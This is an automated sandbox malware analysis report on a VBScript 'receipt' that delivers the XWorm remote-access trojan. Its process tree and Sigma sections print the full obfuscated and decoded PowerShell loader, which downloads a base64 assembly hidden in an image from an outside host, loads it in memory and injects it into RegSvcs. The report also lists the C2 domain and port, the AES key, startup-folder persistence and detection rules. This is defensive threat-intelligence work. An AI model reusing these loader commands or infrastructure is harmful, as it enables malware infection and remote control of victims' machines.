Edit tour

Windows Analysis Report
E7236252-receipt.vbs

Overview

General Information

Sample name:	E7236252-receipt.vbs
Analysis ID:	1436284
MD5:	b393a9fef1cb599ed7b36d715a05643c
SHA1:	74a3c10be06a8114d72aa0a2b7398472c66d1102
SHA256:	9f3ac57533a5bd81bfd29bca0561d9abb86a2c1a1c15e6d1727ff79be79c06b2
Tags:	vbs
Infos:

Detection

XWorm

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Sigma detected: Powershell download and load assembly

Sigma detected: Powershell download payload from hardcoded c2 list

VBScript performs obfuscated calls to suspicious functions

Yara detected Powershell download and execute

Yara detected VBS Downloader Generic

Yara detected XWorm

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Command shell drops VBS files

Connects to a pastebin service (likely for C&C)

Creates autostart registry keys with suspicious values (likely registry only malware)

Found suspicious powershell code related to unpacking or dynamic code loading

Injects a PE file into a foreign processes

Potential evasive JS / VBS script found (domain check)

Sample uses string decryption to hide its real strings

Sigma detected: Base64 Encoded PowerShell Command Detected

Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Sigma detected: Script Initiated Connection to Non-Local Network

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Suspicious powershell command line found

Uses dynamic DNS services

Very long command line found

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Found URL in obfuscated visual basic script code

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

May sleep (evasive loops) to hinder dynamic analysis

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Script Initiated Connection

Sigma detected: Startup Folder File Write

Sigma detected: Suspicious Copy From or To System Directory

Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation

Sigma detected: Usage Of Web Request Commands And Cmdlets

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w10x64

wscript.exe (PID: 7828 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\E7236252-receipt.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

powershell.exe (PID: 4652 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTreeQBhDgTreG0DgTrebwB3DgTreHgDgTreLwBtDgTreG4DgTreLwBtDgTreG8DgTreYwDgTreuDgTreDcDgTreMgBlDgTreHYDgTrebDgTreBvDgTreHYDgTreZQDgTreuDgTreHcDgTredwB3DgTreC8DgTreLwDgTre6DgTreHMDgTrecDgTreB0DgTreHQDgTreaDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreMQDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreQwDgTre6DgTreFwDgTreUDgTreByDgTreG8DgTreZwByDgTreGEDgTrebQBEDgTreGEDgTredDgTreBhDgTreFwDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreG0DgTrebwBxDgTreHUDgTreZQBuDgTreHEDgTredQBlDgTreGkDgTrecgBvDgTreCcDgTreLDgTreDgTrenDgTreFIDgTreZQBnDgTreFMDgTredgBjDgTreHMDgTreJwDgTresDgTreCcDgTreJwDgTrepDgTreCkDgTrefQDgTregDgTreH0DgTre';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD" MD5: DFD66604CA0898E8E26DF7B1635B6326)

conhost.exe (PID: 3300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 7366FBEFE66BA0F1F5304F7D6FEF09FE)

powershell.exe (PID: 8024 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.yamowx/mn/moc.72evlove.www//:sptth' , '1' , 'C:\ProgramData\' , 'moquenqueiro','RegSvcs',''))} }" MD5: DFD66604CA0898E8E26DF7B1635B6326)

cmd.exe (PID: 4772 cmdline: "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\moquenqueiro.vbs" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 7366FBEFE66BA0F1F5304F7D6FEF09FE)

RegSvcs.exe (PID: 5416 cmdline: "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

chrome.exe (PID: 5896 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:/// MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

chrome.exe (PID: 6008 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1836,i,15139392700974412451,17984429462301809972,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

svchost.exe (PID: 820 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

wscript.exe (PID: 3236 cmdline: "C:\Windows\System32\WScript.exe" "C:\ProgramData\moquenqueiro.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

wscript.exe (PID: 5640 cmdline: "C:\Windows\System32\WScript.exe" "C:\ProgramData\moquenqueiro.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://embee-research.ghost.io/infrastructure-analysis-with-dns-pivoting/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["xwormay8450.duckdns.org"], "Port": "8450", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
E7236252-receipt.vbs	JoeSecurity_VBS_Downloader_Generic	Yara detected VBS Downloader Generic	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000010.00000002.2600656630.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000010.00000002.2600656630.0000000000402000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x72f2:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x738f:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x74a4:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x6fa0:$cnc4: POST / HTTP/1.1
Process Memory Space: powershell.exe PID: 4652	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 4652	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x10959d:$b2: ::FromBase64String( 0x109ec0:$b2: ::FromBase64String( 0x10af8c:$b2: ::FromBase64String( 0x10b5a1:$b2: ::FromBase64String( 0x10bcfe:$b2: ::FromBase64String( 0x10c2cc:$b2: ::FromBase64String( 0x109402:$b3: ::UTF8.GetString( 0x109d25:$b3: ::UTF8.GetString( 0x10adf1:$b3: ::UTF8.GetString( 0x10b406:$b3: ::UTF8.GetString( 0x10bb63:$b3: ::UTF8.GetString( 0x10c131:$b3: ::UTF8.GetString( 0x112ac0:$s1: -join 0x1703b9:$s1: -join 0x9e904:$s3: reverse 0xa29d0:$s3: reverse 0xa580c:$s3: reverse 0xa6021:$s3: reverse 0xa6344:$s3: reverse 0xa66c6:$s3: reverse 0xa75dc:$s3: reverse
Process Memory Space: RegSvcs.exe PID: 5416	JoeSecurity_XWorm	Yara detected XWorm	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
16.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
16.2.RegSvcs.exe.400000.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x74f2:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x758f:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x76a4:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x71a0:$cnc4: POST / HTTP/1.1

Other

Source	Rule	Description	Author	Strings
amsi64_8024.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security

Sigma Signatures

Spreading

Sigma detected: Powershell download payload from hardcoded c2 list

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.yamowx/mn/moc.72evlove.www//:sptth' , '1' , 'C:\ProgramData\' , 'moquenqueiro','RegSvcs',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.yamowx/mn/moc.72evlove.www//:sptth' , '1' , 'C:\ProgramData\' , 'moquenqueiro','RegSvcs',''))} }"

System Summary

Sigma detected: Base64 Encoded PowerShell Command Detected

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgT